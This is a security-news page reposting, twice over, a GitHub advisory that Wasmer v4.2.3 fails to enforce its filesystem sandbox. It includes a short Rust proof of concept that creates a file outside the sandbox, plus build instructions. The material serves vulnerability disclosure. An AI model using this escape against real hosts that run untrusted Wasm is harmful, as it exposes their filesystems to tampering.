Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-4mq4-7rw3-vm5j: Filesystem sandbox not enforced

Summary

As of Wasmer version v4.2.3, Wasm programs can access the filesystem outside of the sandbox.

Details

https://github.com/wasmerio/wasmer/issues/4267

PoC

A minimal Rust program:

fn main() {
    let f = std::fs::OpenOptions::new()
        .write(true)
        .create_new(true)
        .open("abc")
        .unwrap();
}

This should be compiled with cargo build --target wasm32-wasi. The compiled program, when run with wasmer WITHOUT --dir, can still create a file in the working directory.

Impact

Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem.

ghsa
Open in Source
#git

Summary

As of Wasmer version v4.2.3, Wasm programs can access the filesystem outside of the sandbox.

Details

wasmerio/wasmer#4267

PoC

A minimal Rust program:

fn main() {
    let f = std::fs::OpenOptions::new()
        .write(true)
        .create_new(true)
        .open("abc")
        .unwrap();
}

This should be compiled with cargo build --target wasm32-wasi. The compiled program, when run with wasmer WITHOUT --dir, can still create a file in the working directory.

Impact

Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem.

References

  • GHSA-4mq4-7rw3-vm5j
  • wasmerio/wasmer#4267

ghsa: Latest News

GHSA-6gf2-ffq8-gcww: GHSL-2024-288: SickChill open redirect in login
ghsa